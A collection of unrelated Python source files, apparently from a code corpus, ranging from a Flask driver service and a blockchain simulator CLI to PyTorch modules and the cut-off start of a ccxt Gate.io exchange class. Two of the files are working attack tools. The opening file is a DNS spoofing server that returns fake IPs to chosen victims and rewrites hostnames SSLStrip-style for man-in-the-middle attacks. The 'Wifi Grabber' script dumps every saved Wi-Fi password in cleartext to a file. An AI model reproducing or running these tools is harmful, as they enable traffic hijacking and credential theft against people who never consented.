if ".%s"%host in dominios:
dominio = ".%s"%host
ttl = 1
DEBUGLOG('Responding with IP = ' + dominios[dominio])
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])
resp.answer.append(rrset)
return resp, dosleep
ips = respuestas(qname.lower(), 'A')
if qname.lower() not in spoof and isinstance(ips, numbers.Integral):
# SSLSTRIP2 transformation
punto = host.find(".")
dominio = host[punto:]
host2 = ''
if host[:5] == 'wwww.' or host[:7] == 'social.':
host2 = 'www%s' % dominio
elif host[:3] == 'web':
host2 = host[3:]
elif host[:7] == 'cuentas':
host2 = 'accounts%s' % dominio
elif host[:5] == 'gmail':
host2 = 'mail%s' % dominio
elif host == 'chatenabled.gmail.google.com': # Yes, It is ugly....
host2 = 'chatenabled.mail.google.com'
if host2 != '':
DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2))
ips = respuestas(host2, 'A')
#print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp)
if isinstance(ips, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp, dosleep
prov_resp = ips[0]
consultas[prov_ip] = prov_resp
ttl = 1
if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims):
if host in spoof:
save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\n')
for spoof_ip in spoof[host].split(","):
DEBUGLOG('Adding fake IP = ' + spoof_ip)
rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip)
resp.answer.append(rrset)
return resp, dosleep
elif Forward:
consultas[prov_ip] = prov_resp
#print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp)
if ip1 is not None:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1)
DEBUGLOG('Adding fake IP = ' + ip1)
resp.answer.append(rrset)
if ip2 is not None:
#Sleep only when using the global request matrix
dosleep = True
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2)
DEBUGLOG('Adding fake IP = ' + ip2)
resp.answer.append(rrset)
if len(fake_ips)>0:
for fip in fake_ips:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
DEBUGLOG('Adding fake IP = ' + fip)
resp.answer.append(rrset)
if not Forward and prov_ip not in nospoofto:
if len(fake_ips) == 0:
DEBUGLOG('No forwarding....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
elif len(fake_ips) > 0:
DEBUGLOG('No forwarding (but adding fake IPs)...')
for fip in fake_ips:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
DEBUGLOG('Adding fake IP = ' + fip)
resp.answer.append(rrset)
return resp, dosleep
for realip in ips:
DEBUGLOG('Adding real IP = ' + realip.to_text())
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text())
resp.answer.append(rrset)
return resp, dosleep
# def std_A2_qry(msg):
# qs = msg.question
# DEBUGLOG(str(len(qs)) + ' questions.')
# iparpa = qs[0].to_text().split(' ',1)[0]
# print 'Host: '+ iparpa
# resp = make_response(qry=msg)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4')
# resp.answer.append(rrset)
# return resp
def std_ASPOOF_qry(msg):
global spoof
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
for q in qs:
qname = q.name.to_text()[:-1]
DEBUGLOG('q name = ' + qname + ' to resolve ' + spoof[qname])
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.')
# resp.answer.append(rrset)
rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname])
resp.answer.append(rrset)
return resp
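# Build a DNS response either from the original query (authoritative + recursion
# available, with the given RCODE) or, when only the message id could be parsed,
# as a bare format-error reply.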
def make_response(qry=None, id=None, RCODE=0):
if qry is None and id is None:
raise Exception, 'bad use of make_response'
if qry is None:
resp = dns.message.Message(id)
# QR = 1
resp.flags |= dns.flags.QR
if RCODE != 1:
raise Exception, 'bad use of make_response'
else:
resp = dns.message.make_response(qry)
resp.flags |= dns.flags.AA
resp.flags |= dns.flags.RA
resp.set_rcode(RCODE)
return resp
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
signal.signal(signal.SIGUSR1, SIGUSR1_handle)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 53))
if Forward:
DEBUGLOG('DNS Forwarding enabled....')
else:
DEBUGLOG('DNS Forwarding disabled....')
DEBUGLOG('bound to UDP port 53.')
serving_ids = []
noserv = True
if ip1 is not None and ip2 is not None and Forward:
sniff = ThreadSniffer()
sniff.start()
while True:
if noserv:
DEBUGLOG('waiting requests.')
try:
message, address = s.recvfrom(1024)
noserv = True
except socket.error as (code, msg):
if code != errno.EINTR:
raise
if noserv:
DEBUGLOG('serving a request.')
requestHandler(address, message)
|
py | 1a303a0002877f40cc5192228c1d3443ee8203e9 | from xml.etree.ElementTree import TreeBuilder
from app.models.entities.driver import Driver
from app.models.entities.vehicle import Vehicle
from app.models.result import Result
from app.extensions import db
from app.models.view.driver_view_model import DriverViewModel
class DriverService:
def __init__(self) -> None:
pass
def insert_driver(self, driver: Driver) -> Result:
result = driver.is_valid()
if not result.success:
return result
driverAlreadyExistsByName = Driver.query.filter_by(name=driver.name).first()
if driverAlreadyExistsByName:
return Result(success=False, message="Ja existe um motorista cadastrado com o nome informado!")
driverAlreadyExistsByCPF = Driver.query.filter_by(cpf=driver.cpf).first()
if driverAlreadyExistsByCPF:
return Result(success=False, message="Ja existe um motorista cadastrado com o cpf informado!")
db.session.add(driver)
db.session.commit()
return Result(success= True, message= "Motorista registrado com sucesso!")
def update_driver(self, current_driver: Driver, driver_view: DriverViewModel):
current_driver.fill_update(driver_view)
result = current_driver.is_valid()
if not result.success:
return result
db.session.commit()
return Result(success=True, message="Motorista atualizado com sucesso!")
def delete_driver(self, driver: Driver):
vehicle = Vehicle.query.filter_by(driver_id=driver.id).first()
if vehicle is not None:
return Result(success=False, message='''Existem veiculos cadastradados com este motorista!
Delete antes os veiculos associados para deletar
o motorista.''')
db.session.delete(driver)
db.session.commit()
return Result(success=True, message="Motorista deletado com sucesso!")
def get_all(self):
return Driver.query.all() |
py | 1a303a3f59492eed209748189cef41bdb68cdfa4 | # This file is part of the Blockchain Data Trading Simulator
# https://gitlab.com/MatthiasLohr/bdtsim
#
# Copyright 2021 Matthias Lohr <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import multiprocessing
import os
from multiprocessing.pool import ApplyResult
from typing import Any, Dict, Optional, Tuple
from queue import Queue
import yaml
from bdtsim.account import AccountFile
from bdtsim.data_provider import DataProviderManager
from bdtsim.environment import EnvironmentManager
from bdtsim.protocol import ProtocolManager, DEFAULT_ASSET_PRICE
from bdtsim.renderer import RendererManager
from bdtsim.simulation import Simulation
from bdtsim.simulation_result import SimulationResult, SimulationResultSerializer
from bdtsim.util.types import to_bool
from .command_manager import SubCommand
DEFAULT_ENVIRONMENT_CONFIGURATION: Dict[str, Any] = {'name': 'PyEVM'}
DEFAULT_DATA_PROVIDER_CONFIGURATION: Dict[str, Any] = {'name': 'RandomDataProvider'}
logger = logging.getLogger(__name__)
class BulkExecuteSubCommand(SubCommand):
help = 'bulk execute simulations and renderings'
def __init__(self, parser: argparse.ArgumentParser) -> None:
super(BulkExecuteSubCommand, self).__init__(parser)
parser.add_argument('bulk_configuration')
parser.add_argument('-p', '--processes', type=int, default=multiprocessing.cpu_count())
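# Load the bulk YAML file and drive everything through one multiprocessing pool:
# simulations are scheduled asynchronously, each success callback serializes the
# result to the target directory and schedules the configured renderers, and the
# final loop drains the queue of pending AsyncResults.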
def __call__(self, args: argparse.Namespace) -> Optional[int]:
with open(args.bulk_configuration, 'r') as fp:
bulk_configuration = yaml.load(fp, Loader=yaml.SafeLoader)
logger.info('creating process pool with %i processes' % args.processes)
process_pool = multiprocessing.Pool(processes=args.processes)
processes: Queue[ApplyResult[Any]] = Queue()
simulation_configurations = bulk_configuration.get('simulations')
if not isinstance(simulation_configurations, list):
raise ValueError('simulations is not a list')
renderer_configurations = bulk_configuration.get('renderers')
if not isinstance(renderer_configurations, list):
raise ValueError('renderers is not a list')
target_directory = bulk_configuration.get('target_directory', 'bulk_output')
os.makedirs(target_directory, exist_ok=True)
def renderer_success_callback(params: Tuple[Dict[str, Any], Dict[str, Any], bytes]) -> None:
sim_conf, renderer_conf, result = params
logger.info('renderer succeeded (%s, %s)' % (str(sim_conf), str(renderer_conf)))
with open(os.path.join(
target_directory,
self.get_output_filename(sim_conf, renderer_conf, suffix=renderer_conf.get('suffix'))
), 'wb') as f:
f.write(result)
def renderer_error_callback(error: BaseException) -> None:
logger.warning('renderer error: %s' % str(error))
def simulation_success_callback(params: Tuple[Dict[str, Any], SimulationResult]) -> None:
local_simulation_configuration, result = params
logger.info('simulation succeeded (%s)' % str(local_simulation_configuration))
logger.debug('writing down result')
with open(os.path.join(
target_directory,
self.get_output_filename(local_simulation_configuration, suffix='result')
), 'wb') as f:
simulation_result_serializer = SimulationResultSerializer(
compression=to_bool(bulk_configuration.get('output_compression', True)),
b64encoding=to_bool(bulk_configuration.get('output_b64encoding', True))
)
f.write(simulation_result_serializer.serialize(result))
logger.debug('scheduling renderers')
for renderer_configuration in renderer_configurations:
processes.put(process_pool.apply_async(
func=self.run_renderer,
kwds={
'simulation_configuration': local_simulation_configuration,
'renderer_configuration': renderer_configuration,
'simulation_result': result
},
callback=renderer_success_callback,
error_callback=renderer_error_callback
))
def simulation_error_callback(error: BaseException) -> None:
logger.warning('simulation error callback called: %s' % str(error))
logger.debug('scheduling simulations')
for simulation_configuration in simulation_configurations:
processes.put(process_pool.apply_async(
func=self.run_simulation,
kwds={
'simulation_configuration': simulation_configuration
},
callback=simulation_success_callback,
error_callback=simulation_error_callback
))
while not processes.empty():
process = processes.get(block=True)
process.wait()
return 0
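# Build protocol, environment and data provider from a single simulation entry
# (falling back to the default environment/data provider), run the simulation and
# return the configuration together with its result so callbacks can pair them.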
@staticmethod
def run_simulation(simulation_configuration: Dict[str, Any]) -> Tuple[Dict[str, Any], SimulationResult]:
protocol_configuration = simulation_configuration.get('protocol')
environment_configuration = simulation_configuration.get('environment')
data_provider_configuration = simulation_configuration.get('data_provider')
if protocol_configuration is None:
raise ValueError('missing protocol configuration')
if environment_configuration is None:
environment_configuration = DEFAULT_ENVIRONMENT_CONFIGURATION
if data_provider_configuration is None:
data_provider_configuration = DEFAULT_DATA_PROVIDER_CONFIGURATION
protocol = ProtocolManager.instantiate(
name=protocol_configuration.get('name', ''),
**protocol_configuration.get('parameters', {})
)
account_file = AccountFile(simulation_configuration.get('account_file'))
environment = EnvironmentManager.instantiate(
name=environment_configuration.get('name', ''),
operator=account_file.operator,
seller=account_file.seller,
buyer=account_file.buyer,
**environment_configuration.get('parameters', {})
)
data_provider = DataProviderManager.instantiate(
name=data_provider_configuration.get('name', ''),
**data_provider_configuration.get('parameters', {})
)
simulation = Simulation(
protocol=protocol,
environment=environment,
data_provider=data_provider,
operator=account_file.operator,
seller=account_file.seller,
buyer=account_file.buyer,
protocol_path_coercion=simulation_configuration.get('protocol_path'),
price=simulation_configuration.get('price', DEFAULT_ASSET_PRICE),
)
simulation_result = simulation.run()
return simulation_configuration, simulation_result
@staticmethod
def run_renderer(simulation_configuration: Dict[str, Any], renderer_configuration: Dict[str, Any],
simulation_result: SimulationResult) -> Tuple[Dict[str, Any], Dict[str, Any], bytes]:
renderer = RendererManager.instantiate(
name=renderer_configuration.get('name', ''),
**renderer_configuration.get('parameters', {})
)
result = renderer.render(simulation_result)
return simulation_configuration, renderer_configuration, result
@staticmethod
def get_output_filename(simulation_configuration: Dict[str, Any],
renderer_configuration: Optional[Dict[str, Any]] = None,
suffix: Optional[str] = None) -> str:
def component2str(component_config: Dict[str, Any]) -> str:
result = str(component_config.get('name'))
parameter_lines = []
for key, value in component_config.get('parameters', {}).items():
parameter_lines.append('%s=%s' % (key, value))
if len(parameter_lines):
result += '-%s' % '-'.join(parameter_lines)
return result
output = '_'.join([
component2str(simulation_configuration.get('protocol', {})),
component2str(simulation_configuration.get('environment', {})),
component2str(simulation_configuration.get('data_provider', DEFAULT_DATA_PROVIDER_CONFIGURATION))
])
if renderer_configuration is not None:
output += '_%s' % component2str(renderer_configuration)
if suffix is not None:
output += '.%s' % suffix
return output
|
py | 1a303a7e7556b807d8dabca004224fcf8f7c42f0 | import pyross.tsi.deterministic
|
py | 1a303bbba43054c984f5a7800187e46e2cf1cea5 | """
Raspberry Pi tests.
"""
|
py | 1a303c7c062fd43b40ab19c623d931b57fd096f7 | import torch
import torch.nn as nn
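# ACM subtracts the spatial mean from the input, pools an additive (K) and a
# subtractive (Q) per-channel vector from the centered features via multi-head
# attention, gates the combination with a modulation vector (P) computed from the
# mean, and can return the K/Q dot product for an orthogonality loss.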
class ACM(nn.Module):
# def __init__(self, in_channels, num_heads=32, orthogonal_loss=True):
def __init__(self, in_channels, num_heads=8, orthogonal_loss=True):
super(ACM, self).__init__()
assert in_channels % num_heads == 0
self.in_channels = in_channels
self.num_heads = num_heads
self.add_mod = AttendModule(self.in_channels, num_heads=num_heads)
self.sub_mod = AttendModule(self.in_channels, num_heads=num_heads)
self.mul_mod = ModulateModule(channel=self.in_channels, num_groups=num_heads, compressions=2)
self.orthogonal_loss = orthogonal_loss
self.init_parameters()
def init_parameters(self):
if self.add_mod is not None:
self.add_mod.init_parameters()
if self.sub_mod is not None:
self.sub_mod.init_parameters()
if self.mul_mod is not None:
self.mul_mod.init_parameters()
def forward(self, x):
mu = x.mean([2, 3], keepdim=True)
x_mu = x - mu
# creates multiplying (modulation) feature
mul_feature = self.mul_mod(mu) # P
# creates additive feature
add_feature = self.add_mod(x_mu) # K
# creates subtractive feature
sub_feature = self.sub_mod(x_mu) # Q
y = (x + add_feature - sub_feature) * mul_feature
if self.orthogonal_loss:
dp = torch.mean(add_feature * sub_feature, dim=1, keepdim=True)
return y, dp
else:
return y
class AttendModule(nn.Module):
def __init__(self, in_channels, num_heads=4):
super(AttendModule, self).__init__()
self.num_heads = int(num_heads)
self.in_channels = in_channels
self.num_c_per_head = self.in_channels // self.num_heads
assert self.in_channels % self.num_heads == 0
self.map_gen = nn.Sequential(
nn.Conv2d(in_channels, num_heads, kernel_size=1, stride=1, padding=0, bias=True, groups=num_heads)
)
self.normalize = nn.Softmax(dim=2)
self.return_weight = False
def init_parameters(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.constant_(m.bias, 0.0)
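# Split channels into heads, softmax-normalize each head's map over the H*W
# positions and take the attention-weighted average of the features, producing
# one 1x1 vector per head, concatenated back to shape (b, c, 1, 1).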
def batch_weighted_avg(self, xhats, weights):
b, c, h, w = xhats.shape
# xhat reshape
xhats_reshape = xhats.view(b * self.num_heads, self.num_c_per_head, h, w)
xhats_reshape = xhats_reshape.view(b * self.num_heads, self.num_c_per_head, h * w)
# weight reshape
weights_reshape = weights.view(b * self.num_heads, 1, h, w)
weights_reshape = weights_reshape.view(b * self.num_heads, 1, h * w)
weights_normalized = self.normalize(weights_reshape)
weights_normalized = weights_normalized.transpose(1, 2)
mus = torch.bmm(xhats_reshape, weights_normalized)
mus = mus.view(b, self.num_heads * self.num_c_per_head, 1, 1)
return mus, weights_normalized
def forward(self, x):
b, c, h, w = x.shape
weights = self.map_gen(x)
mus, weights_normalized = self.batch_weighted_avg(x, weights)
if self.return_weight:
weights_normalized = weights_normalized.view(b, self.num_heads, h * w, 1)
weights_normalized = weights_normalized.squeeze(-1)
weights_normalized = weights_normalized.view(b, self.num_heads, h, w)
weights_splitted = torch.split(weights_normalized, 1, 1)
return mus, weights_splitted
return mus
class ModulateModule(nn.Module):
def __init__(self, channel, num_groups=32, compressions=2):
super(ModulateModule, self).__init__()
self.feature_gen = nn.Sequential(
nn.Conv2d(channel, channel//compressions, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),
nn.ReLU(inplace=True),
nn.Conv2d(channel//compressions, channel, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),
nn.Sigmoid()
)
def init_parameters(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.constant_(m.bias, 0.0)
def forward(self, x):
y = self.feature_gen(x)
return y
if __name__ == '__main__':
x1 = torch.randn(256 * 20 * 20 * 5).view(5, 256, 20, 20).float()
acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=True)
acm.init_parameters()
y, dp = acm(x1)
print(y.shape)
print(dp.shape)
# ACM without orthogonal loss
acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=False)
acm.init_parameters()
y = acm(x1)
print(y.shape)
|
py | 1a303d137c88cb611703c2d83001fd5964a1e2d4 | import subprocess
import time
import os
localtime = time.asctime( time.localtime(time.time()))
data = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\n')
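# 'netsh wlan show profiles' prints lines like '    All User Profile     : <SSID>';
# keep the text after the colon, dropping the leading space and trailing '\r'.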
profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
file = open("result.txt", "a")
print("\n[+] Wifi Grabber: " + localtime + "\n")
file.write("\n[+] Wifi Grabber: " + localtime + "\n")
print("========================================================",file=file)
print(localtime, file=file)
print("========================================================",file=file)
for i in profiles:
results = subprocess.check_output(['netsh','wlan','show','profile',i,
'key=clear']).decode("utf-8").split('\n')
results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
try:
print("{:<30} | {:<}".format(i, results[0]),file=file)
except IndexError:
print("{:<30} | {:<}".format(i, ""))
file.close()
time.sleep(3)
exit(code=True)
|
py | 1a303e265fe5afb1b4c1ab347327b59041b58f21 | ###########################################################################
# Created by: Hang Zhang
# Email: [email protected]
# Copyright (c) 2017
###########################################################################
import os, sys
BASE_DIR = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(BASE_DIR)
import yaml
import argparse
import numpy as np
from addict import Dict
import torch
import torch.nn as nn
from torch.utils import data
from tensorboardX import SummaryWriter
import torchvision.transforms as transform
from torch.nn.parallel.scatter_gather import gather
import encoding.utils as utils
from encoding.nn import SegmentationLosses, SyncBatchNorm
from encoding.parallel import DataParallelModel, DataParallelCriterion
from encoding.datasets import get_dataset
from encoding.models import get_segmentation_model
CONFIG_PATH = './results/config.yaml'
SMY_PATH = os.path.dirname(CONFIG_PATH)
GPUS = [0, 1]
# model settings
parser = argparse.ArgumentParser(description='model specification')
parser.add_argument('--with_att', action='store_true', default= False, help='whether use attention to fuse rgb and dep')
parser.add_argument('--att_type', type=str, default='AG2', help='Attention type to fuse rgb and dep')
settings= parser.parse_args()
print('settings attention:{} attention type:{}'.format(settings.with_att, settings.att_type))
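# Trainer wires up the RGB + depth dataloaders, the two-stream segmentation model
# (optionally fused with attention), SGD with a 10x higher learning rate for the
# non-backbone parameters, and TensorBoard logging of loss/pixAcc/mIoU.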
class Trainer():
def __init__(self, args):
self.args = args
# data transforms
input_transform = transform.Compose([
transform.ToTensor(), # convert RGB [0,255] to FloatTensor in range [0, 1]
transform.Normalize([.485, .456, .406], [.229, .224, .225])]) # mean and std based on imageNet
dep_transform = transform.Compose([
transform.ToTensor(),
transform.Normalize(mean=[0.2798], std=[0.1387]) # mean and std for depth
])
# dataset
data_kwargs = {'transform': input_transform, 'dep_transform': dep_transform,
'base_size': args.base_size, 'crop_size': args.crop_size}
trainset = get_dataset(args.dataset, split=args.train_split, mode='train', **data_kwargs)
testset = get_dataset(args.dataset, split='val', mode='val', **data_kwargs)
# dataloader
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
self.trainloader = data.DataLoader(trainset, batch_size=args.batch_size, drop_last=True, shuffle=True, **kwargs)
self.valloader = data.DataLoader(testset, batch_size=args.batch_size, drop_last=False, shuffle=False, **kwargs)
self.nclass = trainset.num_class
# model and params
model = get_segmentation_model(args.model, dataset=args.dataset, backbone=args.backbone, pretrained=True,
root='../../encoding/models/pretrain', n_features=256,
with_att=settings.with_att, att_type=settings.att_type,
)
print(model)
# optimizer using different LR
base_ids = list(map(id, model.base.parameters()))
base_dep_ids = list(map(id, model.dep_base.parameters()))
base_params = filter(lambda p: id(p) in base_ids + base_dep_ids, model.parameters())
other_params = filter(lambda p: id(p) not in base_ids + base_dep_ids, model.parameters())
self.optimizer = torch.optim.SGD([{'params': base_params, 'lr': args.lr},
{'params': other_params, 'lr': args.lr * 10}],
lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
# criterions
self.criterion = SegmentationLosses(se_loss=args.se_loss,
aux=args.aux,
nclass=self.nclass,
se_weight=args.se_weight,
aux_weight=args.aux_weight)
# lr scheduler
self.scheduler = utils.LR_Scheduler_Head(args.lr_scheduler, args.lr, args.epochs,
iters_per_epoch=len(self.trainloader), warmup_epochs=10)
self.best_pred = 0.0
# using cuda
self.device = torch.device("cuda:0" if args.cuda else "cpu")
if args.cuda:
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!") # [30,xxx]->[10,...],[10,...],[10,...] on 3 GPUs
model = nn.DataParallel(model, device_ids=GPUS)
self.model = model.to(self.device)
# for writing summary
path = "/".join(("{}-{}".format(*i) for i in settings.__dict__.items()))
self.writer = SummaryWriter(os.path.join(SMY_PATH, path))
# resuming checkpoint
if args.resume is not None and args.resume != 'None':
if not os.path.isfile(args.resume):
raise RuntimeError("=> no checkpoint found at '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
if args.cuda:
self.model.module.load_state_dict(checkpoint['state_dict'])
else:
self.model.load_state_dict(checkpoint['state_dict'])
if not args.ft:
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.best_pred = checkpoint['best_pred']
print("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
# clear start epoch if fine-tuning
if args.ft:
args.start_epoch = 0
def training(self, epoch):
train_loss = 0.0
self.model.train()
total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0
for i, (image, dep, target) in enumerate(self.trainloader):
image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)
self.scheduler(self.optimizer, i, epoch, self.best_pred)
self.optimizer.zero_grad()
outputs = self.model(image, dep)
loss = self.criterion(outputs, target)
loss.backward()
self.optimizer.step()
correct, labeled = utils.batch_pix_accuracy(outputs.data, target)
inter, union = utils.batch_intersection_union(outputs.data, target, self.nclass)
total_correct += correct
total_label += labeled
total_inter += inter
total_union += union
train_loss += loss.item()
if (i+1) % 50 == 0:
print('epoch {}, step {}, loss {}'.format(epoch + 1, i + 1, train_loss / 50))
self.writer.add_scalar('train_loss', train_loss / 50, epoch * len(self.trainloader) + i)
train_loss = 0.0
pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)
IOU = 1.0 * total_inter / (np.spacing(1) + total_union)
mIOU = IOU.mean()
print('epoch {}, pixel Acc {}, mean IOU {}'.format(epoch + 1, pixAcc, mIOU))
self.writer.add_scalar("mean_iou/train", mIOU, epoch)
self.writer.add_scalar("pixel accuracy/train", pixAcc, epoch)
def train_n_evaluate(self):
for epoch in range(self.args.epochs):
# run on one epoch
print("\n===============train epoch {}/{} ==========================\n".format(epoch, self.args.epochs))
# one full pass over the train set
self.training(epoch)
# evaluate for one epoch on the validation set
print('\n===============start testing, training epoch {}\n'.format(epoch))
pixAcc, mIOU, loss = self.validation(epoch)
print('evaluation pixel acc {}, mean IOU {}, loss {}'.format(pixAcc, mIOU, loss))
# save the best model
is_best = False
new_pred = (pixAcc + mIOU) / 2
if new_pred > self.best_pred:
is_best = True
self.best_pred = new_pred
utils.save_checkpoint({'epoch': epoch + 1,
'state_dict': self.model.module.state_dict(),
'optimizer': self.optimizer.state_dict(),
'best_pred': self.best_pred}, self.args, is_best)
def validation(self, epoch):
# Fast test during the training
def eval_batch(model, image, dep, target):
# model, image, target already moved to gpus
pred = model(image, dep)
loss = self.criterion(pred, target)
correct, labeled = utils.batch_pix_accuracy(pred.data, target)
inter, union = utils.batch_intersection_union(pred.data, target, self.nclass)
return correct, labeled, inter, union, loss
self.model.eval()
total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0
for i, (image, dep, target) in enumerate(self.valloader):
image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)
with torch.no_grad():
correct, labeled, inter, union, loss = eval_batch(self.model, image, dep, target)
total_correct += correct
total_label += labeled
total_inter += inter
total_union += union
total_loss += loss.item()
pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)
IOU = 1.0 * total_inter / (np.spacing(1) + total_union)
mIOU = IOU.mean()
if i % 40 == 0:
print('eval mean IOU {}'.format(mIOU))
loss = total_loss / len(self.valloader)
self.writer.add_scalar("mean_iou/val", mIOU, epoch)
self.writer.add_scalar("pixel accuracy/val", pixAcc, epoch)
return pixAcc, mIOU, loss
if __name__ == "__main__":
print("-------mark program start----------")
# configuration
args = Dict(yaml.safe_load(open(CONFIG_PATH)))
args.cuda = (args.use_cuda and torch.cuda.is_available())
args.resume = None if args.resume=='None' else args.resume
torch.manual_seed(args.seed)
trainer = Trainer(args)
# import pdb; pdb.set_trace()
print('Starting Epoch:', trainer.args.start_epoch)
print('Total Epoches:', trainer.args.epochs)
trainer.train_n_evaluate()
|
py | 1a303ec63cfa30e4d3af946a584e1b191fd1c6c5 | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class gateio(Exchange):
def describe(self):
return self.deep_extend(super(gateio, self).describe(), {
'id': 'gateio',
'name': 'Gate.io',
'countries': ['KR'],
'rateLimit': 10 / 3, # 300 requests per second or 3.33ms
'version': 'v4',
'certified': True,
'pro': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg',
'doc': 'https://www.gate.io/docs/apiv4/en/index.html',
'www': 'https://gate.io/',
'api': {
'public': 'https://api.gateio.ws/api/v4',
'private': 'https://api.gateio.ws/api/v4',
},
'referral': {
'url': 'https://www.gate.io/ref/2436035',
'discount': 0.2,
},
},
'has': {
'cancelOrder': True,
'createMarketOrder': False,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDeposits': True,
'fetchFundingRate': True,
'fetchFundingRateHistory': True,
'fetchFundingRates': True,
'fetchIndexOHLCV': True,
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': False,
'fetchTrades': True,
'fetchWithdrawals': True,
'transfer': True,
'withdraw': True,
},
'api': {
'public': {
'spot': {
'get': {
'currencies': 1,
'currencies/{currency}': 1,
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'tickers': 1,
'order_book': 1,
'trades': 1,
'candlesticks': 1,
},
},
'margin': {
'get': {
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'cross/currencies': 1,
'cross/currencies/{currency}': 1,
},
},
'futures': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/funding_rate': 1.5,
'{settle}/insurance': 1.5,
'{settle}/contract_stats': 1.5,
'{settle}/liq_orders': 1.5,
},
},
'delivery': {
'get': {
